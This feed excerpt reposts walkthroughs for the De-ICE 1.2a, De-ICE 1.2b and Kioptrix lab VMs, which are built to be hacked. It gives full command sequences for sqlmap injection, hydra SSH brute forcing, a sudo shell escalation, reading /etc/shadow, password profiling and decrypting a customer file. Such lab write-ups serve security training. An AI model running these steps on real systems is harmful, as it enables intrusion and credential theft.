A quick "ping" scan with nmap, shows which hosts are connected to the network. Once the target had been discovered a detailed port scan (TCP &amp;amp; UDP) was taken by using unicornscan. To check the results another detailed TCP port scan was done, though this time it was done using nmap. Unicornscan uses a lot less time to do a port scan compared to nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by "information gathering". The attacker uses the "-a" option, which allows for "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details" as well as increasing the scan speed by "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.&lt;br /&gt;
&lt;br /&gt;
The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows for the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code allowed with it.&lt;br /&gt;
&lt;br /&gt;
The attacker uses sqlmap to speed up the injection process as it is designed to test multiple injection methods. sqlmap has pre-built commands which allows the attacker to find common sensitive information (such as; the running services and versions, current user and the database admin, user privileges as well as viewing every table along with the contents). The attacker chooses to capture all the users and their passwords to the database services. The passwords used in the database are encrypted, however, they use a well-known scheme which is easily cracked. The result of this, gives the attacker 50 working usernames as well as 49 known passwords too.&lt;br /&gt;
&lt;br /&gt;
The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else known password, any blank passwords or their usernames as the passwords), by brute forcing the SSH remote login. The result of this action, gives the attacker remote access to the system with 50 credentials.&lt;br /&gt;
&lt;br /&gt;
On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file-they have been. The attacker then backups the file and replaces it with their own file - which is a shell prompt.&lt;br /&gt;
&lt;br /&gt;
The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).&lt;br /&gt;
&lt;br /&gt;
As the attacker now has access to the complete system, they access every user folder at once and view random files at their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them out for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).&lt;br /&gt;
&lt;br /&gt;
Game over&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ifconfig eth0&lt;br /&gt;
ifconfig eth0 192.168.1.59&lt;br /&gt;
ifconfig eth0&lt;br /&gt;
nmap 192.168.1.* -n -sn -sP&lt;br /&gt;
us -H -msf -Iv 192.168.1.120 -p 1-65535 &amp;&amp; us -H -mU -Iv 192.168.1.120 -p 1-65535&lt;br /&gt;
nmap -p 1-65535 -T4 -A -v 192.168.13.120&lt;br /&gt;
firefox 192.168.1.120    # Add new product -&gt; view product&lt;br /&gt;
cd /pentest/database/sqlmap&lt;br /&gt;
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" -f -b --current-user --is-dba --is-dba --privileges --dbs --dump&lt;br /&gt;
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" --users --passwords&lt;br /&gt;
cd output/192.168.1.120/&lt;br /&gt;
ll&lt;br /&gt;
grep -i administrator log&lt;br /&gt;
grep -i localhost log | grep -v : | sort | uniq&lt;br /&gt;
grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed  "s/'@'localhost'//" &gt; /tmp/users&lt;br /&gt;
grep "clear-text" log | sort | uniq&lt;br /&gt;
grep "clear-text" log | sort | uniq | sed "s/    clear-text password: //" &gt; /tmp/passwords&lt;br /&gt;
wc -l /tmp/users&lt;br /&gt;
hydra -L /tmp/users -P /tmp/passwords -e ns 192.168.1.120 ssh 2&gt;/dev/null | tee /tmp/output&lt;br /&gt;
#medusa -h 192.168.1.120 -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh&lt;br /&gt;
ssh ccoffee@192.168.1.120&lt;br /&gt;
ls&lt;br /&gt;
cd scripts&lt;br /&gt;
ls -lah&lt;br /&gt;
sudo -l&lt;br /&gt;
cat getlogs.sh&lt;br /&gt;
mv getlogs.sh getlogs.bkup&lt;br /&gt;
echo "/bin/sh" &gt; getlogs.sh&lt;br /&gt;
cat getlogs.sh&lt;br /&gt;
chmod +x getlogs.sh&lt;br /&gt;
ls -l&lt;br /&gt;
./getlogs.sh&lt;br /&gt;
id&lt;br /&gt;
exit&lt;br /&gt;
sudo getlogs.sh&lt;br /&gt;
sudo /home/ccoffee/scripts/getlogs.sh&lt;br /&gt;
id&lt;br /&gt;
id &amp;&amp; /sbin/ifconfig &amp;&amp; uname -a &amp;&amp; cat /etc/shadow &amp;&amp; ls -lah /root/&lt;br /&gt;
ls -lAhR /home&lt;br /&gt;
#cat /home/aallen/gravy.txt&lt;br /&gt;
cat /home/aspears/hbkae&lt;br /&gt;
cat /home/bbanter/notes&lt;br /&gt;
cat /home/cchisholm/reminders.text&lt;br /&gt;
cat /home/ccoffee/DONOTFORGET&lt;br /&gt;
#cat /home/hlovell/creepy.doc&lt;br /&gt;
cat /home/jalvarez/draft&lt;br /&gt;
cat /home/jdavenport/company_address.txt&lt;br /&gt;
#cat /home/jdavenport/svrc.txt&lt;br /&gt;
cat /home/jduff/todo.txt&lt;br /&gt;
#cat /home/krenfro/list&lt;br /&gt;
cat /home/ktso/personnel.doc&lt;br /&gt;
#cat /home/kwebber/list&lt;br /&gt;
#cat /home/lmartinez/favorite.txt&lt;br /&gt;
#cat /home/mnader/layout&lt;br /&gt;
cat /home/rpatel/schedule&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
- De-ICE.net v1.2a has a static IP address of 192.168.1.120. Make sure you are on the same subnet as it!&lt;br /&gt;
- When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!&lt;br /&gt;
- Each time you start De-ICE.net v1.2a it will generate fresh SSH keys - so it's different each time!&lt;br /&gt;
- I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-446751241770551518?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/446751241770551518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/446751241770551518'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-de-icenet-v12a-120a-level-1-disk.html' title='HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1727881194698532653</id><published>2011-09-11T23:29:00.001+08:00</published><updated>2011-09-11T23:29:06.652+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='Common User Passwords Profiler'/><category scheme='http://www.blogger.com/atom/ns#' term='Unicornscan'/><category scheme='http://www.blogger.com/atom/ns#' term='Java Compiler'/><category scheme='http://www.blogger.com/atom/ns#' term='Hydra'/><title type='text'>HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-videos/43651-%5Bvideo%5D-de-ice-net-v1-2b-1-20b-%7Blevel-1-disk-3-version-b%7D.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blip.tv/g0tmi1k/de-ice-v1-2b-1-120-5443965"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?8gajaiu58f7rccd"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Brief Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The "vulnerable-by-design" series De-ICE, has released another challenge. However, it's in two different parts - which makes the naming more confusing! This is De-ICE level 1-disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge. The students of "HackingDojo" produced their own exploitable LiveCD which was released under the de-ice name. This is it. To date all of Heorot.net releases (in date order) are as follows:&lt;br /&gt;
&lt;br /&gt;
De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)&lt;br /&gt;
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)&lt;br /&gt;
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)&lt;br /&gt;
pWnOS (pWnOS v1.0.zip)&lt;br /&gt;
Hackerdemia (hackerdemia-1.1.0.iso)&lt;br /&gt;
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)&lt;br /&gt;
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)&lt;br /&gt;
&lt;br /&gt;
Method&lt;br /&gt;
&lt;br /&gt;
Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)&lt;br /&gt;
Scan network for the host (nmap)&lt;br /&gt;
Port scanned host (unicornscan)&lt;br /&gt;
Enumerated running services running open ports (nmap)&lt;br /&gt;
Enumerated possible username(s) (Netcat)&lt;br /&gt;
Brute forced login details (Hydra)&lt;br /&gt;
Profiled other users (CUPP)&lt;br /&gt;
Escalated privilege by re-creating custom encryption program (Java)&lt;br /&gt;
Found the "flag" (a database file)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
de-ice-1.120-1.0b.iso (MD5: 5AFEA4D036681093408AE493D4BD2672)&lt;br /&gt;
Spare or a Virtual machine (Example: Virtual Box or VMware Player)&lt;br /&gt;
nmap – (Can be found on BackTrack 5).&lt;br /&gt;
unicornscan – (Can be found in BackTrack 5's repository).&lt;br /&gt;
hydra – (Can be found on BackTrack 5).&lt;br /&gt;
Common User Passwords Profiler – (Can be found on BackTrack 5).&lt;br /&gt;
Java compiler – (Can be found on BackTrack 5).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Walkthrough&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
By doing a quick "ping" scan with nmap, it reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP &amp; UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan as well as enumerating which services are running by using nmap. Unicornscan is quicker doing a port scan (especially with UDP scanning). However, nmap has the upside of it being able to do more by "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using "-a" option). The attacker also increases the scan speed (by "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).&lt;br /&gt;
&lt;br /&gt;
The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that it the web site is "under maintenance", with methods of contact - a telephone number and email address.&lt;br /&gt;
&lt;br /&gt;
The port scan revealed that there was a SMTP service running and decided to attempt to use the email address to identity possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name it will return if the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find its valid login, csadmin.&lt;br /&gt;
&lt;br /&gt;
The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password. however it would of taken a lot longer for it to reach it). The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker found the valid password, 'rocker'.&lt;br /&gt;
&lt;br /&gt;
Upon logging into the system remotely, the attacker finds if there are any other valid users in the system (the result is 4). The attacker then continues on by browsing the users (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user - which is also commonly used as their password.&lt;br /&gt;
&lt;br /&gt;
After building up the profile for each user, the attacker then generates possible passwords using this information, by using CUPP (Common User Passwords Profiler). The attacker enters in the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the user (sdadmin) password (his child's name and year of birth - donovin1998).&lt;br /&gt;
&lt;br /&gt;
The attacker logs in with the new credentials and views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feeling towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (nickname and a few numbers at the end-databaser60).&lt;br /&gt;
&lt;br /&gt;
When the attacker logs in once again, they soon find the first part to an email which has been in every user account so far. Then contents of the email has been "corrupted", however, the header file of the message is still in contact. The subject of the message implies the purpose of it, "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which shows the beginning of the possible source code.&lt;br /&gt;
&lt;br /&gt;
The attacker then builds up the code, from the three found parts so far, which has been written in java and the function of it was the generation function for the new passwords policy. There are comments left in the code, saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds the code (input &amp; conversion functions).&lt;br /&gt;
&lt;br /&gt;
Once the program was complete, the attacker runs it to generate the passwords for sysadmin and the root account. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.&lt;br /&gt;
&lt;br /&gt;
The attacker now has access to the complete system...&lt;br /&gt;
&lt;br /&gt;
Game over&lt;br /&gt;
&lt;br /&gt;
...and choose to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file, and by trying all the encryption algorithms with the super user's password, they were able to decrypt the file and view the content in plain text - revealing customers' details, such as names, email addresses, usernames, passwords and more!&lt;br /&gt;
&lt;br /&gt;
Game over...again&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ifconfig eth0&lt;br /&gt;
ifconfig eth0 192.168.1.192&lt;br /&gt;
ifconfig eth0&lt;br /&gt;
nmap 192.168.1.* -n -sn -sP&lt;br /&gt;
us -H -msf -Iv 192.168.1.20 -p 1-65535 &amp;&amp; us -H -mU -Iv 192.168.1.20 -p 1-65535&lt;br /&gt;
nmap -p 1-65535 -T4 -A -v 192.168.1.20&lt;br /&gt;
firefox 192.168.1.20    # customerserviceadmin@nosecbank.com&lt;br /&gt;
nc -v 192.168.1.20 25&lt;br /&gt;
HELO attacker&lt;br /&gt;
VRFY customerserviceadmin&lt;br /&gt;
mail from: attacker@slax.example.net&lt;br /&gt;
rcpt to: customerserviceadmin&lt;br /&gt;
rcpt to: csadmin&lt;br /&gt;
quit&lt;br /&gt;
wc -l /pentest/passwords/wordlists/darkc0de.lst&lt;br /&gt;
find / -name password.lst&lt;br /&gt;
wc -l /opt/framework3/msf3/data/john/wordlists/password.lst&lt;br /&gt;
hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2&gt;/dev/null | tee /tmp/output&lt;br /&gt;
ssh csadmin@192.168.1.20   # rocker&lt;br /&gt;
id&lt;br /&gt;
cat /etc/passwd   # sysadmin, dbadmin, sdadmin, csadmin&lt;br /&gt;
pwd&lt;br /&gt;
ls -lah&lt;br /&gt;
cd mailserv_download/&lt;br /&gt;
ls -lah&lt;br /&gt;
cat * | less    # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)&lt;br /&gt;
exit&lt;br /&gt;
cd /pentest/passwords/cupp/&lt;br /&gt;
python cupp.py -i   # Paul, Donovin, 22121998, nosecbank&lt;br /&gt;
hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2&gt;/dev/null | tee -a /tmp/output&lt;br /&gt;
ssh sdadmin@192.168.1.20   # donovin1998&lt;br /&gt;
id&lt;br /&gt;
pwd&lt;br /&gt;
ls -lah&lt;br /&gt;
cd mailserv_download/&lt;br /&gt;
ls -lah&lt;br /&gt;
cat * | less    # dbadmin (Fred, databaser)&lt;br /&gt;
exit&lt;br /&gt;
python cupp.py -i   # Fred, databaser, nosecbank&lt;br /&gt;
hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2&gt;/dev/null | tee -a /tmp/output&lt;br /&gt;
ssh dbadmin@192.168.1.20   # databaser60&lt;br /&gt;
id&lt;br /&gt;
pwd&lt;br /&gt;
ls -lah&lt;br /&gt;
cd mailserv_download/&lt;br /&gt;
ls -lah&lt;br /&gt;
cat * | less   # sysadmin, New Custom Encryption for Passwords&lt;br /&gt;
umask 002&lt;br /&gt;
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' &gt; /tmp/output&lt;br /&gt;
su csadmin   # rocker&lt;br /&gt;
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' &gt;&gt; /tmp/output&lt;br /&gt;
su sdadmin   # donovin1998&lt;br /&gt;
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' &gt;&gt; /tmp/output&lt;br /&gt;
cat /tmp/output | sort -g&lt;br /&gt;
cat /tmp/output | sort -g | cut -f2-&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
exit&lt;br /&gt;
geany deice.java&lt;br /&gt;
less deice.java&lt;br /&gt;
javac deice.java&lt;br /&gt;
java deice    # sysadmin - 531/{{tor/rv/A&lt;br /&gt;
java deice    # root - 31/Fwxw+2&lt;br /&gt;
ssh sysadmin@192.168.1.20   # 7531/{{tor/rv/A&lt;br /&gt;
id&lt;br /&gt;
su -    # 31/Fwxw+2&lt;br /&gt;
id &amp;&amp; /sbin/ifconfig &amp;&amp; uname -a &amp;&amp; cat /etc/shadow &amp;&amp; ls -lAh ~/&lt;br /&gt;
pwd&lt;br /&gt;
exit&lt;br /&gt;
pwd&lt;br /&gt;
ls&lt;br /&gt;
cat Note_to_self&lt;br /&gt;
ls -lAhR /home&lt;br /&gt;
cd /home/ftp/incoming/&lt;br /&gt;
ls -l&lt;br /&gt;
openssl -h&lt;br /&gt;
openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"&lt;br /&gt;
su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"'   # 31/Fwxw+2&lt;br /&gt;
ls -l&lt;br /&gt;
cat useracc_update.csv&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;deice.java&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;import java.io.*;&lt;br /&gt;
//import java.util.Arrays;&lt;br /&gt;
&lt;br /&gt;
public class deice&lt;br /&gt;
{&lt;br /&gt;
 public static void main(String[] args)&lt;br /&gt;
 {&lt;br /&gt;
    try&lt;br /&gt;
    {&lt;br /&gt;
       System.out.println("[&gt;] De-ICE.net v1.2b (1.20b) Password Generator");&lt;br /&gt;
&lt;br /&gt;
       BufferedReader in=new BufferedReader(new InputStreamReader(System.in));&lt;br /&gt;
       System.out.print("[?] Username: ");&lt;br /&gt;
       String input=in.readLine();&lt;br /&gt;
&lt;br /&gt;
       int[] output=processLoop(input);&lt;br /&gt;
       //System.out.println("[+] Output: "+Arrays.toString(output));&lt;br /&gt;
&lt;br /&gt;
       String outputASCII="";&lt;br /&gt;
       for(int i=0;i&lt;output.length;i++) outputASCII+=(char) output[i];
       System.out.println("[&gt;] Password: "+outputASCII);&lt;br /&gt;
&lt;br /&gt;
    }&lt;br /&gt;
    catch(IOException e)&lt;br /&gt;
    {&lt;br /&gt;
       System.out.println("[-] IO Error!");&lt;br /&gt;
    }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
 /*input is username of account*/&lt;br /&gt;
 public static int[] processLoop(String input){&lt;br /&gt;
    int strL=input.length();&lt;br /&gt;
    int lChar=(int)input.charAt(strL-1);&lt;br /&gt;
    int fChar=(int)input.charAt(0);&lt;br /&gt;
    int[] encArr=new int[strL+2];&lt;br /&gt;
    encArr[0]=(int)lChar;&lt;br /&gt;
&lt;br /&gt;
    for(int i=1;i&amp;lt;strL+1;i++) encArr[i]=(int)input.charAt(i-1);&lt;br /&gt;
&lt;br /&gt;
    encArr[encArr.length-1]=(int)fChar;&lt;br /&gt;
    encArr=backLoop(encArr);&lt;br /&gt;
    encArr=loopBack(encArr);&lt;br /&gt;
    encArr=loopProcess(encArr);&lt;br /&gt;
    int j=encArr.length-1;&lt;br /&gt;
&lt;br /&gt;
    for(int i=0;i&amp;lt;encArr.length;i++){&lt;br /&gt;
       if(i==j) break;&lt;br /&gt;
       int t=encArr[i];&lt;br /&gt;
       encArr[i]=encArr[j];&lt;br /&gt;
       encArr[j]=t;&lt;br /&gt;
       j--;&lt;br /&gt;
    }&lt;br /&gt;
    return encArr;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
 /*Note the pseudocode will be implemented with the&lt;br /&gt;
 root account and my account, we still need to implement it with the csadmin, sdadmin,&lt;br /&gt;
 and dbadmin accounts though*/&lt;br /&gt;
 public static int[] backLoop(int[] input){&lt;br /&gt;
    int ref=input.length;&lt;br /&gt;
    int a=input[1];&lt;br /&gt;
    int b=input[ref-1];&lt;br /&gt;
    int ch=(a+b)/2;&lt;br /&gt;
&lt;br /&gt;
    for(int i=0;i&amp;lt;ref;i++){&lt;br /&gt;
       if(i%2==0) input[i]=(input[i]%ch)+(ref+i);&lt;br /&gt;
       else input[i]=(input[i]+ref+i);&lt;br /&gt;
    }&lt;br /&gt;
    return input;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
 public static int[] loopBack(int[] input){&lt;br /&gt;
    int ref=input.length/2;&lt;br /&gt;
    int[] encNew=new int[input.length+ref];&lt;br /&gt;
    int ch=0;&lt;br /&gt;
&lt;br /&gt;
    for(int i=(ref/2);i&amp;lt;input.length;i++){&lt;br /&gt;
       encNew[i]=input[ch];&lt;br /&gt;
       ch++;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    for(int i=0;i&amp;lt;encNew.length;i++){&lt;br /&gt;
       if(encNew[i]&lt;=33) encNew[i]=33+(++ref*2);
       else if(encNew[i]&gt;=126) encNew[i]=126-(--ref*2);&lt;br /&gt;
       else{&lt;br /&gt;
          if(i%2==0) encNew[i]-=(i%3);&lt;br /&gt;
          else encNew[i]+=(i%2);&lt;br /&gt;
       }&lt;br /&gt;
    }&lt;br /&gt;
    return encNew;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
 public static int[] loopProcess(int[] input){&lt;br /&gt;
    for(int i=0;i&amp;lt;input.length;i++){&lt;br /&gt;
       if(input[i]==40||input[i]==41) input[i]+=input.length;&lt;br /&gt;
       else if(input[i]==45) input[i]+=20+i;&lt;br /&gt;
    }&lt;br /&gt;
    return input;&lt;br /&gt;
 }&lt;br /&gt;
}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
- De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!&lt;br /&gt;
- The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.&lt;br /&gt;
- I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1727881194698532653?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1727881194698532653'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1727881194698532653'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-de-icenet-v12b-120b-level-1-disk.html' title='HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-2069837305414950376</id><published>2011-09-11T23:12:00.000+08:00</published><updated>2011-09-11T23:12:19.312+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='smbclient'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>HOWTO : Kioptrix - Level 1</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/38997-%5Bvideo%5D-kioptrix-level-1-samba.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blip.tv/file/4924035"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?7rsj1agn28aounc"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Brief Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.kioptrix.com/blog/"&gt;Kioptrix&lt;/a&gt; is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness method which is a quick attack and straight to root.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Scan network for hosts (nmap)&lt;br /&gt;
Scan target for running services (nmap)&lt;br /&gt;
Detect network shares (smbclient)&lt;br /&gt;
Exploit samba weakness, Trans2open (Metasploit)&lt;br /&gt;
Game Over&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD58DB6CE65652880327B92150B08106EA)&lt;br /&gt;
VMware player OR workstation. Download here&lt;br /&gt;
nmap – (Can be found on BackTrack 4-R2). Download here&lt;br /&gt;
smbclient – (Can be found on BackTrack 4-R2). Download here&lt;br /&gt;
metasploit – (Can be found on BackTrack 4-R2). Download here&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Walkthrough&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this are:&lt;br /&gt;
&lt;br /&gt;
* OS: Linux v2.4.x (2.4.9-18)&lt;br /&gt;
* Samba: Samba smbd (wordgroup: MYGROUP)&lt;br /&gt;
&lt;br /&gt;
The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:&lt;br /&gt;
&lt;br /&gt;
* Anonymous login&lt;br /&gt;
* Hostname (KIOPTRIX)&lt;br /&gt;
* Workgroup (MYGROUP)&lt;br /&gt;
* Defautl hidden admin shares (IPC$, ADMIN$)&lt;br /&gt;
&lt;br /&gt;
The attacker proceeds begins by starting up metasploit and searching for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;start-network&lt;br /&gt;
dhclient eth0&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
nmap 192.168.0.* -n -sn -sP&lt;br /&gt;
nmap 192.168.0.111 -T4 -O -sV -sS   #-sC -A -p- -v&lt;br /&gt;
&lt;br /&gt;
#nmblookup -A 192.168.0.111       # Hostname&lt;br /&gt;
smbclient -L \\192.168.0.111 -N   # What services are available on a server&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
msfconsole&lt;br /&gt;
search samba&lt;br /&gt;
